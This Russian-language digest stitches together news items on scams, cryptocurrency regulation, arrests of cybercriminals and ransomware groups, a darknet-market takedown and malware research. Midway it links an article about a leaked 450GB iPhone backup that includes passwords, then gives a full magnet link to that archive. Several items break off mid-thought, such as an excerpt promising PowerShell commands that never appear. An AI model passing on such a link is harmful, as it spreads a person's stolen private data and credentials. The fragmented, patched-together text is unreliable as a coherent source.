Вел Купер с супругой должны освободить апартаменты на Кент Авеню не позднее чем через 6 месяцев с тех пор, как заявление о согласии на конфискацию будет рассмотрено. После заявления о признании вины Купера отпустили под домашний арест с электронным браслетом и с залогом в 1 млн долларов, за который поручились пять ответственных лиц.
Далее о признании вины заявил Гарри Смит (он же Игорь Беркович). Мужчина эмигрировал из Одессы в США в декабре 1994 года с семьей. В 2014 году стал натурализованным гражданином. В 2015 году сменил имя на Игорь Берк, а в 2018-м после ареста одного из сообщников за банковскую кражу сменил свое имя на Гарри Смит. Смита арестовали в Бруклине 20 апреля 2021 года и сразу доставили в больницу, поскольку он страдал героиновой абстиненцией («ломка» — болезненное состояние, развивающееся у зависимого человека при отказе от употребления наркотиков). Из объяснений самого Смита часть его недавних поездок в Одессу была связана именно с лечением наркозависимости.
В то же время адвокат, убеждая суд смягчить меру пресечения, характеризовал Смита как человека с крепкими связями с общиной, поскольку он живет в Восточном округе Нью-Йорка более 27 лет, женат и продолжает поддерживать отношения со своей сестрой и престарелым отцом, имеет постоянную работу в похоронном бюро – Caribe Funeral Home, активно посещает религиозные церемонии в Нью-Йорке. Очевидно, что в последующие несколько месяцев суд должен определиться с условиями конфискации имущества Гарри Смита. Впереди приговоры, возможно, будут смягчены признанием вины.
Испанская биржа 2gether, проработавшая в течение пяти лет на рынке криптовалют, неожиданно закрыла доступ к сайту и аккаунтам пользователей. Компания, как уже многие криптосервисы до нее, оправдывает решение о заморозке деятельности недостатком ресурсов, связанное с текущей ситуацией на рынке.
Возобновление работы площадки возможно лишь в том случае, если каждый из 100 тысяч клиентов безвозмездно пожертвует бирже 20 евро.
Компания дала срок пользователям до 10-го июля. После этой даты вся криптовалюта на счетах с балансом ниже $20 будет конфискована, а аккаунты заблокированы. Биржа не намерена обсуждать свое решение, поэтому удаляет свое присутствие в соцсетях.
2gether стала первой крупной биржевой площадкой, открыто закрывшей бизнес в связи с влиянием криптозимы. Вряд ли кто-либо из клиентов останется торговать, если компания откроет доступ к счетам. Принудительно списав с их по 20 евро.
Если верить статистике сайта CoinMarketCap, за последний месяц 25 мелких биржевых площадок прекратили деятельность. С падением 2gether регуляторы более внимательно начнут присматриваться к ситуации в отрасли, что отразится на ужесточении законодательства.
Вероятно, от бирж потребуют сегрегирования счетов. Торговля криптовалютами может быть адаптирована под правила регулирования деятельности брокера. Лицензирование потребует дополнительных затрат, которые станут неподъемными для ряда мелких компаний. Их закрытие, как и ужесточение регулирования, станут очередным поводом для распродажи криптовалют.
Предполагаемый мошенник, известный как «Аферист из Tinder», может быть арестован в Испании.
Речь идёт о 31-летнем Саймон Левивее, о котором Netflix снял документальный фильм. В нём рассказывается об израильском мошеннике, который с помощью известного приложения знакомился с женщинами, выдавая себя за сына алмазного магната. Далее он просил одолжить ему денег, выдумывая истории о том, как на него напали и пытаются отследить его банковские карты, поэтому он не может ими пользоваться. Деньги Левиев никогда не возвращал.
Фильм посмотрел испанский полицейский. Он узнал в нём мужчину, которого в 2019 году проверяли в Альхесирасе. Тогда водитель предъявил поддельные права на имя некоего Майкла Билтона. Его автомобиль марки Maserati застрял на пляже, и его пришлось эвакуировать. Левиев был вместе с блондинкой из России.
Полицейские отпустили его, взяв адрес для дальнейшей связи. И сейчас попытались связаться с ним, но не смогли. Тем не менее, расследование возобновили, и теперь Левиеву грозит тюремное заключение.
Арест REvil вызвал страх и панику среди «Русских
хакеров»
Недавние аресты участников хак-группы REvil породили волну паники на хакерских форумах.
Эксперты Trustwave отмечают, что первые признаки нервозности можно было
заметить еще в ноябре 2021 года, когда появились сообщения о секретных
переговорах между ФБР и ФСБ. Задолго до арестов участников REvil некоторые
преступники уже предполагали, что Россия более не может считаться «безопасной
гаванью».
После арестов волнения только усилились. К примеру, один из пользователей пишет, что администратор анедеграундного форума ****, известный под ником RED\KAJIT, теперь бесследно пропал.
Многие участники форумов теперь обмениваются многочисленными советами о том,
как обезопасить себя, в спешке удаляют все свои прошлые сообщения, меняют
аккаунты, выбрасывают устройства с помощью которых выходили в
сеть.
Вместе с тем, многие отмечают и крайний не профессионализм REvil: «Нужно было подумать, прежде чем лезть и шифровать многомиллиардные компании, школы, государства. С кем они пытались соперничать?»
От
себя уже отмечал в своем блоге, что по тем видеоматериалом, которые
силовики/журналисты выложили в сеть: выбор софта, как и выбор криптовалютных
кошельков REvil, как минимум «вызывает вопросы»
Многие в криминальном подполье убеждены, что самый большой провал REvil — это
показное хвастовство своими достижениями, расслабленность, раздача интервью
блогерам с YouTube, и полнейшая убежденность, что их никогда не
поймают.
Источники:

Арест REvil вызвал страх и панику среди «Русских хакеров»🤨 Недавние аресты участников хак-группы REvil породили волну паники на хакерских форумах. Эксперты Trustwave отмечают, что первые признаки нервозности можно было заметить еще в ноябре 2021 года, когда появились сообщения о секретных...
t.me

](https://xakep.ru/2022/01/21/revil-darknet/)
Недавние аресты участников хак-группы REvil породили волну обсуждений на хакерских форумах. Аналитики из Trustwave SpiderLabs изучили, о чем теперь говорят в русскоязычном даркнете, и пришли к выводу, что многие преступники напуганы случившимся.
 xakep.ru

L0phtCrack ](https://xakep.ru/2022/01/21/revil-darknet/l)
Знаменитый инструмент для аудита и взлома паролей, L0phtCrack, обновился, спустя семь лет после выпуска последнего релиза. Новая версия обзавелась поддержкой многоядерных CPU и GPU, благодаря чему L0phtCrack теперь работает в несколько раз быстрее.
 xakep.ru
Таможня Гонконга арестовала двух местных жителей по подозрению в отмывании денег на сумму более 380 млн гонконгских долларов ($48,7 млн) через личные банковские счета и криптовалютную биржу. Об этом говорится в пресс- релизе.
Сотрудники ведомства провели обыск в доме, где проживали подозреваемые — сестра и брат. В ходе расследования оказалось, что в период с мая по ноябрь 2020 года они открыли счета в различных банках Гонконга, а также на платформе для торговли цифровыми активами в целях отмывания денег «из неизвестных источников».
Фигурантов дела освободили под залог. В таможне не исключили новых арестов в ходе дальнейшего расследования. Максимальное наказание — штраф в размере 5 млн гонконгских долларов (около $641 000) и лишение свободы сроком на 14 лет с конфискацией доходов, полученных преступным путем.
Напомним, в июле гонконгские таможенники арестовали четверых подозреваемых в отмывании $113 млн через криптовалюту. Группа проводила операции на протяжении 15 месяцев через подставные компании с использованием 40 кошельков для стейблкоина USDT.
В ОАЭ вступит в силу закон, согласно которому за рекламу мошеннических криптовалютных схем и незарегистрированных ICO предусмотрено пять лет лишения свободы и штраф до 1 млн дирхамов.
Как сообщает региональное издание The National, в начале следующего года правительство Объединенных Арабских Эмиратов примет жесткие меры для повышения безопасности в Интернете и защиты населения от финансового мошенничества в рамках радикальных правовых реформ, о которых ранее говорил президент Халифа бен Заид Аль Нахайян.
Поправки расширят действующие законы государства, касающиеся киберпреступлений. Так, лицам, рекламирующим мошеннические криптовалютные схемы и проекты, организующие ICO без лицензии соответствующих органов, грозит пять лет тюрьмы и/или штраф в размере от 250 000 (около $68 000) до 1 млн дирхамов (около $272 250).
Юрист Al Rowaad Advocates Хассан Эльхаис (Hassan Elhais) добавил, что за размещение вводящей в заблуждение рекламы криптовалютных проектов или распространение неточных данных в Интернете о каком-либо инвестиционном продукте предусмотрено тюремное заключение и/или штраф в размере от 20 000 (около $5 445) до 500 000 дирхамов (более $136 100)
Такое же наказание будет применяться к любым представителям общественности, которые продвигают криптовалютные фирмы, незаконно работающие в стране. Эльхаис пояснил, что ранее законы ОАЭ запрещали рекламу криптовалют, но в них не были оговорены меры наказания.
Обновленное законодательство также налагает наказание в виде тюремного заключения или штраф от 50 000 (около $13 600) до 200 000 дирхамов (около $54 450) для правонарушителей, создающих поддельные учетные записи электронной почты или сайты от лица известных компаний.
Наказание увеличивается до двух лет лишения свободы, если преступник использует фальшивые аккаунты для дискредитации людей, за которых он себя выдает. Использование ботов для распространения ложной информации тоже может привести к лишению свободы сроком на два года и штрафу от 100 000 (около $27 220) до 1 млн дирхамов, сказал Эльхаис.
Этой весной администрация Дубая сообщила о мошенническом криптовалютном проекте «Dubai Coin», который якобы был запущен в качестве «официальной цифровой валюты Дубая». Учитывая растущее количество криптовалютных проектов, нацеленных на обман пользователей, в октябре полиция Дубая объявила о партнерстве с фирмой BitOasis для обучения инвесторов выявлению мошеннических схем.
Немецкие правоохранительные органы провели успешную операцию по изъятию серверов даркнет-рынка Kingdom Market, известного продажами наркотиков, вредоносного ПО, поддельных документов и других инструментов для киберпреступников.
В настоящее время ведётся анализ серверной инфраструктуры Kingdom Market для установления личностей, стоящих за работой сайта. Один из предполагаемых связанных с Kingdom Market людей был идентифицирован как Алан Билл, гражданин Словакии, также известный под псевдонимом «Vendor». В операции также участвовали правоохранительные органы США, Швейцарии и Молдовы.
Kingdom Market — англоязычная торговая площадка, работающая с марта 2021 года. На ней предлагалось более 42 000 товаров, в том числе около 3 600 товаров из Германии. Немецкая полиция утверждает, что на торговой площадке были зарегистрированы «десятки тысяч учетных записей клиентов и несколько сотен учетных записей продавцов». Операторы сайта принимали к оплате криптовалюты Bitcoin, Litecoin, Monero и Zcash, также получая 3% комиссию за обработку продаж нелегальных товаров через платформу.
source:
bka.de/DE/Presse/Listenseite_Pressemitteilungen/2023/Presse2023/231220_PM_Darknet_Kingdom_Market.html
offshorealert.com/usa-v-alan-bill-criminal-complaint-kingdom-market-crypto-
darknet-marketplace
С прошлой пятницы 28 января 2022 года население бруклинской федеральной тюрьмы MDC пополнилось 41-летним Евгением Цветненко, белым гражданином России и Австралии, откуда его накануне экстрадировали из тюрьмы Хакеа рядом с городом Перт, столицей Западной Австралии.
Там Цветненко жил не тужил до ареста 20 декабря 2018 года по запросу нашего
министерства юстиции, а Хакеа тюрьма как тюрьма, разве что австралийская,
построенная 40 лет назад и рассчитанная на 248 мужчин.
С сентября 1991 года ее сделали тюрьмой строгого режима, но это качается
только мер охраны, а держат там по-прежнему либо еще не осужденных, либо
только что приговоренных перед тем, как разослать их по тюрьмам страны. С 2016
года два блока тюрьмы Хакеа были переоборудованы для женщин, но к Евгению
Цветненко это не относится. В каких условиях он содержался, не уточняется, но
после очередного отказа освободить Цветненко под залог его адвокат Джеффри
Робертсон написал в комитет ООН по правам человека, что Евгения «по-прежнему
больше 12 часов в день держат в камере с убийцами, насильниками и педофилами».
До этого ему трижды отказывали из опасений, что россиянин сбежит из Австралии,
ставшей ему второй родиной. В августе прошлого года Цветненко отказался от
четвертой попытки, и 27 января в международном аэропорту Перта федеральная
полиция передала его нашей Маршальской службе
В уголовном деле №1:15-cr-0016-KBF «Соединенные Штаты против Евгения (он же Женя) Цветненко» и еще шести человек, 13 страниц которого почти пять лет хранятся в базе данных манхэттенского федерального суда, 862 доступных документа и 137 недоступных. Первый документ датирован 22 июля 2016 года, когда ему заочно предъявили предварительное обвинение, а последний днем его ареста в Нью-Йорке 28 января этого года, на следующий день после прибытия в США. Судья-магистрат Она Ванг по видеосвязи вкратце ознакомила его с сутью обвинения в «джентльменском наборе» преступлений белого воротничка ХХI века – кибермошенничестве, похищении личных данных и отмывании заработанных на этом денег. Защиту Цветненко в суде представлял манхэттенский адвокат Джошуа Дрател, не назначенный судом, а приглашенный за деньги, которых у подсудимого, во всяком случае до ареста, куры не клевали. Среди следователей по его делу помощник манхэттенского федерального прокурора Ольга Зверович. В предъявленных обвинениях утверждается, что Евгений Цветненко незаконно заработал примерно 15,4 млн долларов, за что ему грозит более 40 лет лишения свободы, но до приговора он считается невиновным и, скорее всего, будет ожидать это решение в бруклинской федеральной тюрьме под номером 91421-054.
Следующее заседание по его делу назначено на 14 февраля.
Евгений (Женя) Цветненко родился в 1980 в Ростове в семье биохимиков, и в 1992
году его семья эмигрировала в Австралию. Как именно это произошло, не
уточняется, и, как сообщалось в октябре 2016 года на австралийском сайте
immigrationgurus.com, «у его родителей было два чемодана и всего 6 тыс.
долларов, чтобы начать новую жизнь». Из других источников в Интернете
известно, что через два года после прибытию в Австралию, то есть в 1994 году,
когда Жене было 14 лет, его родители получили гражданство, а из России
улетели, «понимая, что жизнь там не для них», и в Перте нашли работу в местном
университете. «Мы приехали в Австралию с тремя сумками и пятью тысячами
долларов, которые родители получили, продав квартиру, - рассказал сам Евгений
в конце апреля 2013 года выходящему в Западной Австралии на русском языке
еженедельнику «Единение». - Вот такие бизнесмены были тогда в России. Сейчас
бы эта квартира стоила 200-300 тысяч долларов. Работу вначале было найти
трудно. Когда они подавали заявления на научные должности, родителям говорили,
что их квалификация выше, чем требуется. Приходилось рекламные брошюры
разносить. Затем они нашли работу в университете Кертина. Мама устроилась
преподавателем, а папа – в научном центре». Позже их сын Женя бросил
университет, говорилось на сайте immigrationgurus.com, а в 2005 году основал в
своей спальне компанию [платных СМС-сервисов] SMS Gateway, питаясь готовой
лапшой и существуя на зарплату невесты Лидии, тоже россиянки. Меньше чем через
два года он зарабатывал больше 4 млн долларов в месяц и его называли самым
богатым молодым предпринимателем Западной Австралии.
«Я учился в университете Западной Австралии, на курсе “электроника и электронная инженерия”, но после второго курса мне как-то надоело. – рассказал Евгений еженедельнику «Единение». - В то время я еще не думал о собственном бизнесе, хотя какие-то зачаточные мысли об этом у меня были. Во время учебы я подрабатывал, делая переводы с русского на английский, и думал о возможности создать компанию, занимающуюся переводами. Но дальше этого дело не пошло. Многие мои друзья после школы не сразу пошли в университет, а один год присматривались, ездили по миру. Мне, наверное, тоже надо было так сделать. Бросив университет, я устроился в музыкальную группу. Через год понял, что карьеру в музыке не сделаю, и нашел «настоящую» работу, связанную с программированием. Я, вообще-то, увлекался компьютерами с 7 лет. Работу я нашел довольно легко, видимо, мои знания были достаточными. Года три-четыре я работал программистом в нескольких компаниях. Одной из компаний, ведущих интернет-бизнес, руководил молодой парень, лет около 23-х. Он был уверен в себе, разъезжал на Ferrari. И, несмотря, на то, что дела у него пошли не слишком хорошо, я вдруг понял, что можно самому попытаться вести свой бизнес, что это вполне реально. Когда эта компания закрылась, мне надо было принимать решение: либо искать другую работу, либо самому попытаться воплотить свои идеи. Я к тому времени уже купил дом и должен был выплачивать довольно большой кредит. Тогда я нашел спасительный, хотя и нелегкий для себя вариант. Я устроился на работу в компанию Power Business Systems, а по вечерам, разрабатывал свои идеи по использованию интернета. Так прошел год. Это было в 2005 году».
Объясняя свой стремительный «путь наверх» в другом интервью, Евгений Цветенко сказал, что «изучал СМС-рынок, который только набирал обороты, и подумал, что было бы здорово, если бы люди могли платить с мобильных телефонов, ведь они фактически, как кредитные карты!» — рассказал он в одном из своих интервью. Благодаря услугам SMS Gateway, о которых они не просили, австралийцы стали получать на свои мобильные телефоны прогнозы погоды, гороскопы, информацию об автозаправках и пробках, игры, новости и т. д. Брали с них за это примерно 10 долларов в месяц, о чем они вначале не знали, но против чего в основном не протестовали. Через полтора года после запуска сервиса у Евгения Цветненко было 147 тыс. подписчиков, которые приносили ему, как уже было сказано, до 4 млн долларов в месяц. В 2014 г.
Цветненко основал компанию по торговле биткоинами и разработке мобильных приложений, использующих криптовалюту. Компаньоном Цветненко стала наша компания мобильной агрегации Mobile Messenger, которая запустила в США услугу автоподписки на платные текстовые сообщения. Стоимость услуги составляла 9 долларов 99 центов в месяц, которые списывались со счета абонента без его ведома. Так Евгений Цветненко попал в поле зрения нашей федеральной прокуратуры, которая вместе с ним предъявила обвинения бывшему управляющему Mobile Messenger Фрейзеру Томпсону, Фрэнсису Ассифуаху, который отвечал там за цифровой контент, и еще четверым американцам, которые проходят в деле, как «СС» («Co-Conspirators»), то есть «сообщники».
Разбогатев смолоду, Цветненко прославился роскошным образом жизни, в
частности, став владельцем дорогой недвижимости в США и Европе, а также парком
автомобилей экстра-класса, включая Ferrari и Lamborghini. Свадьбу с Лидией он
сыграл в 2008 году и по одним данным потратил на это 600 тыс. долларов, а по
другим вдвое больше, но, так или иначе, свадьба стала одним из самых
обсуждаемых светских событий в Австралии. Платье новобрачной было расшито
драгоценными камнями, под венец она приехала в белой карете, а в небо вместо
традиционных голубей выпустили сотни тысяч разноцветных бабочек. Молодожены
вращались в светских кругах, разъезжая по ним в Lamborghini, и их прозвали
Posh and Beck, как называли легендарного британского футболиста Дэвида Бэкхема
и его жену Викторию в начале их отношений. Красиво жить не запретишь, и
29-летие Лидии Евгений отметил в Голливуде, пригласив какую-то из сестер
Кардашьян и рэпера Снупа Догга, а на собственное 30-летие заказал ледяные
изваяния своих любимых машин Lamborghini и Ferrari в натуральную величину и
торт, украшенный стодолларовыми купюрами с его портретом в президентском
овале. «Мне нечего скрывать, - сказал Евгений Цветненко в одном интервью того
времени. - Я никогда не пытался никого обмануть. Я сделал так много денег и
так быстро, что еще не успел толком посчитать их»,
Добром все это не кончилось, и 20 декабря 2018 года Евгения, он же Женя
Цетненко арестовали по запросу манхэттенской федеральной прокуратуры.
«В июле 2016 года я узнал, что меня обвиняли в совершении уголовных преступлений в 2012 и 2013 годах в Соединенных Штатах Америки, – заявил он уже из тюрьмы через своего пресс-секретаря Эвелин Даффи. - Я невиновен в предполагаемых преступлениях». До решения суда он считается невиновным, но у федерального прокурора Южного округа штата Нью-Йорк Дамиана Уильяма другое мнение. «Предположительно, - заявил он в пресс-релизе 28 января этого года, - Евгений Цветненко за 9 долларов 99 центов в месяц подписывал сотни тысяч пользователей сотовых телефонов на услуги без их ведома или желания. В результате этой аферы с автоподпиской Цветненко и его соучастники предположительно втихую умыкнули у своих ничего не подозревающих жертв больше 41 млн долларов в виде незаконных доходов. Благодаря постоянным усилиям и координации с нашими австралийскими партнерами-правоохранителями этот гражданин Австралии был экстрадирован в США для ответа на звонок американского правосудия».
В том же пресс-релизе старший следователь федеральной налоговой службы IRS Джолин Симпсон назвала экстрадицию Евгения «четким доказательством того, что огромное богатство Цветненко и его проживание на другом континенте мало помогли его защите от ответа на обвинения, предъявленные ему американскими властями». Примерно такого же мнения оказался глава нью-йоркского отделения ФБР Майкл Дрисколл, отметивший, что «Цветненко и его сообщники состряпали аферу, которая, как предполагается, превратила тысячи пользователей мобильниками в участников подписных услуг, о чем они не знали», а дело, по которому проходят эти семеро Дрисколл назвал «напоминанием всем нам бдительнее знакомиться с финансовыми требованиями, неважно, на какую сумму, так как даже мелкая афера, по большому счету, оборачивается совсем другим». Как утверждает прокуратура, в общем Цветненко с сообщниками «нагрели» пользователей своих услуг на 41,389,725 долларов, присвоив себе больше 20 млн, львиная доля которых досталась Евгению, он же Женя. На просьбу репортера еженедельника «Единение» Владимира Кузьмина дать совет молодым бизнесменам, почти 9 лет назад 33-летний Цветненко сказал, что без риска в бизнесе не обойтись.
«Собственно, кто такой предприниматель? – пояснил он. - Этот человек хорошо знаком с риском, продвигая новую идею, которая, может быть, принесет прибыль. Однако можно схитрить немного и попробовать свою идею в маленьком масштабе. Этого вполне достаточно, чтобы понять, будет ли успешной твоя идея… Главное, начать в маленьком масштабе. Для меня такая схема была вполне успешной». Интересно, повторил бы он это сейчас, в камере манхэттенской федеральной тюрьмы?
с мошенниками
© Depositphotos / itchaz.gmail.com
МОСКВА, 7 фев — РИА Новости. До конца ноября банки должны усилить контроль за денежными переводами клиентов. Как пишут "[Известия](https://iz.ru/1287628/2022-02-07/kontrol-za-bankovskimi- operatciiami-grazhdan-usiliat)", эти меры помогут бороться с мошенниками, онлайн-казино, криптообменниками и финансовыми пирамидами.
Ссылаясь на дорожную карту правительства по регулированию криптовалют,
подписанную в начале года вице-премьером Дмитрием
Чернышенко, СМИ сообщило, что
Центробанк порекомендовал банкам отслеживать счета, по которым проводят
операции с "необычно большим" числом граждан: более десяти человек в день и
свыше 50 в месяц, а также более 30 трансакций с физлицами ежедневно.
01:32
РБК: Western Union прекратит осуществлять переводы внутри
России
Кредитные организации могут посчитать подозрительными переводы суммой более
100 тысяч рублей в день и свыше миллиона в месяц и проверить такие трансакции
на попытки легализации преступных доходов или финансирования терроризма. Если
опасения банка подтвердятся, трансакцию заблокируют, а если таких отказов в
течение года накопится более двух, организация оставит за собой право
расторгнуть договор с клиентом.
"Проводимая Банком России и кредитными организациями работа не предполагает тотальный контроль за операциями физических лиц и направлена на выявление отдельных зон риска, связанных с использованием нелегальными субъектами финансовых услуг для расчетов с российскими гражданами. Эта работа не затронет малый и микробизнес", — заверил журналистов Центробанк.
Ранее Банк России опубликовал доклад, в котором предлагается запретить майнинг криптовалют на территории страны, использование инфраструктуры российского финансового рынка для любых операций с ними, а также вложение финансовыми организациями средств в криптовалюты и связанные с ними инструменты.
После этого в правительстве утвердили дорожную карту для рынка криптовалют, которая предусматривает их регулирование, а не запрет и, в частности, идентификацию клиентов, ответственность за нарушения и возможное "приземление" криптоплощадок в России.
источник: ria.ru
[ https://www.dailyveracity.com/2022/07/09/4chan-has-hunter-bidens-iphone-is- releasing-450gb-more-private-data-including-passwords-ladies-gentlemen-we-are- in/ ](https://www.dailyveracity.com/2022/07/09/4chan-has-hunter-bidens-iphone- is-releasing-450gb-more-private-data-including-passwords-ladies-gentlemen-we- are-in/)
magnet:?xt=urn:btih:ba031f1b19eb501808b6145641ea1a49e41bb6bd&xt=urn:btmh:122056121502a7164ef4d04873e2794ffa218d5e0532a919a409bba3c6c7a7cd0eb3&dn=iphone_ipadBackup.zip&tr=udp%3a%2f%2fopen.stealth.si%3a80%2fannounce&tr=udp%3a%2f%2fexodus.desync.com%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.torrent.eu.org%3a451%2fannounce&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.tiny- vps.com%3a6969%2fannounce&tr=udp%3a%2f%2fopentracker.i2p.rocks%3a6969%2fannounce&tr=udp%3a%2f%2fipv4.tracker.harry.lu%3a80%2fannounce&tr=udp%3a%2f%2f9.rarbg.com%3a2810%2fannounce&tr=udp%3a%2f%2fwww.torrent.eu.org%3a451%2fannounce&tr=http%3a%2f%2fopentracker.i2p.rocks%3a6969%2fannounce&tr=https%3a%2f%2fopentracker.i2p.rocks%3a443%2fannounce&tr=http%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce
Трафферы внедряют ключевые слова и ссылки в названия плейлистов и описания
подкастов, ради SEO-оптимизации мутных ресурсов, так как результаты работы
веб-плеера Spotify отображаются в выдаче поисковиков (например в Google).
— Одним из первых внимание на эту проблему обратил ИБ-энтузиаст Кароль
Пацерек, обнаружив в Spotify плейлист с названием «Sony Vegas Pro 13
Crack...». В этом случае ссылки в названии и описании плейлиста вели на
подозрительные сайты с бесплатным софтом, который с высокой долей вероятности
содержит в себе малвари.
Депутаты планируют разработать документ с учетом мнений участников рынка, и затем представить его для обсуждения в правительство и Банк России
В Госдуме начали разрабатывать проект поправок для создания в России национальной криптобиржи, сообщают «Ведомости». В середине ноября депутаты провели совещание и обсудили с участниками рынка требующиеся для этого изменения в закон «О цифровых финансовых активах», рассказали изданию близкие к Госдуме источники.
Представителей Минфина и Центробанка на встрече не было, депутаты планируют сначала подготовить документ с учетом позиции рынка, а затем представить его для обсуждения в правительство и Банк России, уточнил источник.
«Бессмысленно говорить, что криптовалюты не существует, но проблема в том, что она циркулирует в большом потоке вне государственного регулирования. Это миллиарды рублей недополученных бюджетных доходов в виде налогов», — сказал член комитета по экономической политике Сергей Алтухов.
Он подтвердил начало подготовки проекта поправок, которые позволили бы создать в российской юрисдикции криптобиржу. Алтухов отметил, что надо создать условия для легализации криптовалют и отрегулировать «правила игры», которые не будут противоречить позиции правительства и Банка России. Сейчас депутаты обсуждают алгоритм действий и «железобетонные» доводы для регуляторов, уточнил депутат.
Собеседник издания, знакомый с процессом обсуждения, сообщил, что никто не хочет рассматривать биржу как средство распространения криптовалюты в качестве платежного средства внутри России — скорее как обменник, где можно ее задекларировать и конвертировать. По его словам, одна или несколько таких площадок обязательно должны быть в российской юрисдикции, чтобы исключить инфраструктурные риски. Такие как возможные ограничения со стороны зарубежных партнеров или риски, связанные с хранением данных на территории другой страны.
17 ноября в Государственную Думу был внесен новый законопроект о майнинге. Кроме регулирования добычи цифровых активов, документ предусматривает, что криптовалюта может продаваться без использования российской информационной инфраструктуры или с ее использованием только в рамках экспериментального правового режима.
Комментируя этот законопроект, глава комитета Госдумы по финансовому рынку Анатолий Аксаков сообщил, что российские власти заинтересованы в запрете оборота криптовалюты на территории страны. Но уточнил, что далее планируется рассмотреть законопроект об экспериментальных правовых режимах, который разрешит использование криптовалют, например, для поставки импортных товаров.
How it started:
In early February 2022 Volexity made a discovery that led to one of the most
fascinating and complex incident investigations Volexity had ever worked. The
investigation began when an alert from a custom detection signature Volexity
had deployed at a customer site (“Organization A”) indicated a threat actor
had compromised a server on the customer’s network. While Volexity quickly
investigated the threat activity, more questions were raised than answers due
to a very motivated and skilled advanced persistent threat (APT) actor, who
was using a novel attack vector Volexity had not previously encountered.....
How it finished:
A file named servtask.bat had invoked the Microsoft command-line registry
utility and PowerShell to run the following commands:

Networks for Covert Access ](https://www.volexity.com/blog/2024/11/22/the- nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks- for-covert-access/)
In early February 2022, notably just ahead of the Russian invasion of Ukraine, Volexity made a discovery that led to one of the most fascinating and complex incident investigations Volexity had ever worked. The investigation began when an alert from a custom detection signature Volexity had...
 www.volexity.com
Национальное агентство по борьбе с преступностью Великобритании арестовало 17-летнего подростка, подозреваемого в причастности к кибератаке на городское транспортное агентство Transport for London.
«17-летний юноша был задержан по подозрению в нарушении Закона о неправомерном использовании компьютеров в связи с атакой, которая была совершена на TfL 1 сентября», — говорится в заявлении агентства.
Подростка допросили и освободили под залог.
Теперь агентство тесно сотрудничает с Национальным центром кибербезопасности и TfL для управления инцидентом.
Как отметил сотрудник института кибербезопасности SANS Уилл Томас, также был арестован 17-летний подросток из Уолсолла. Это произошло в июле 2024 года. Подростка арестовали за возможную связь с атакой с использованием вируса- вымогателя на MGM Resorts. Эту атаку приписали хакерскому коллективу Scattered Spider, который действовал как филиал банды вымогателей BlackCat.
1 сентября агентство Transport for London сообщило, что подверглось кибератаке и закрыло доступ к различным ИТ-системам, чтобы предотвратить её распространение.
Хотя атака не нарушила работу транспортных служб в городе, она повлияла на внутренние системы, используемые персоналом, различные онлайн-системы для клиентов и возможность возврата средств. Также она вызвала постоянные сбои в работе службы Dial-a-Ride TfL, которая предоставляет услуги по доставке от двери до двери для людей с ограниченными возможностями.
Позднее TfL подтвердило, что данные, включая имена клиентов, контактные данные, адреса электронной почты и домашние адреса, были украдены в ходе атаки. Злоумышленники также могли получить доступ к данным о возврате средств с карты Oyster и информации о банковских счетах примерно 5 тысяч человек.
В мае 2023 года Transport for London также пострадало от утечки данных после того, как банда вымогателей Clop похитила данные примерно 13 тысяч клиентов из сервисов MOVEit Transfer организации.
westmidlands.police.uk/news/west-midlands/news/news/2024/july/walsall- teenager-arrested-in-joint-west-midlands-police-and-fbi-operation
Мужчина и женщина подыскивали в телеграм-каналах переселенцев и предлагали получить якобы финансовую помощь от иностранных партнеров. Для этого жильцы переходили на фейковый фишинговый сайт, вводили реквизиты своих банковских карт и аферисты снимали все деньги с их счетов. По налаженной схеме фигуранты ввели в заблуждение около полста граждан. Им грозит от 3 до 5 лет заключения.
В полицию Киева обратились представители одного из государственных банков, которые сообщили, что неизвестные лица, представляясь сотрудниками финансового учреждения, совершают мошеннические действия в отношении клиентов, - снимают деньги с их счетов. Следователи столичного главка полиции при оперативном сопровождении работников управления киберполиции в г. Киеве и процессуального руководства Киевской городской прокуратуры разоблачили двух аферистов.
"Подозреваемыми оказались жители Запорожья - 28-летний мужчина и 42-летняя женщина. Установлено, что соучастники создали фейковый фишинговый сайт по аналогу одного из известных государственных банков, а дальше под видом работников этого банка подыскивали в телеграм-каналах переселенцев и предлагали получить якобы финансовую помощь от иностранных партнеров. Переходя по ссылке и вводя реквизиты своих банковских карт, граждане предоставляли аферистам доступ к банку, а те в свою очередь снимали деньги с их счетов. Установлено, что мошенники ввели в заблуждение 54 человека ", - рассказал начальник отдела расследования преступлений общеуголовной направленности следственного управления полиции Киева Евгений Черняховский.
Всего подозреваемые сняли со счетов граждан более 400 тысяч гривен. В ходе обысков по местам их проживания следователи изъяли блокноты с черновыми записями, документацию, которая удостоверяет их преступную деятельность, компьютерную технику, мобильные телефоны и сим-карты. Продолжаются мероприятия по установлению других участников преступления, а также потерпевших.
Следователи полиции Киева сообщили злоумышленникам о подозрении в совершении уголовного правонарушения, предусмотренного ч. 3 ст. 190 Уголовного кодекса Украины - мошенничество, совершенное в условиях военного или чрезвычайного положения, что нанесло значительный ущерб потерпевшему. Санкция статьи предусматривает от 3 до 5 лет заключения. Досудебное расследование продолжается.
Оперативниками Следственного департамента МВД России пресечена деятельность межрегиональной организованной группы. Ее участники, объединенные по этническому признаку, подозреваются в серии преступлений в сфере информационно-телекоммуникационных технологий.
«Предварительно установлено, что злоумышленники на протяжении нескольких лет размещали на интернет-площадках объявления о продаже различных товаров по ценам ниже рыночных. В телефонном разговоре от покупателей требовали внести предоплату на указанные реквизиты. После этого заказанные вещи не отправляли, а полученные деньги похищали. В целях конспирации аферисты периодически меняли номера телефонов, а для получения средств использовали электронные кошельки и банковские карты, оформленные на третьих лиц», - рассказала официальный представитель МВД России Ирина Волк.
В настоящее время задокументировано более 60 эпизодов хищения с ущербом на общую сумму свыше трех миллионов рублей. Следователями различных подразделений МВД России возбуждены уголовные дела по признакам преступлений, предусмотренных статьей 158 УК РФ.
Раньше Tox использовался для переговоров с жертвами, а теперь становится непосредственной частью кибератак.
Необычное применение протокола Tox обнаружили специалисты из Uptycs, которые проанализировали ELF-файл под названием “72client”. Этот файл имеет функционал бота и умеет запускать скрипты на скомпрометированном хосте с помощью Tox.
Tox – это бессерверный протокол для децентрализованной текстовой, голосовой и видеосвязи в интернете. Все криптографические функции выполняются с помощью криптобиблиотеки NaCl.
Исследовав “72client”, специалисты сделали несколько выводов:
ELF-файл написан на языке программирования C и к нему статически подключена только одна библиотека – c-toxcore, которая является эталонной реализацией протокола Tox;
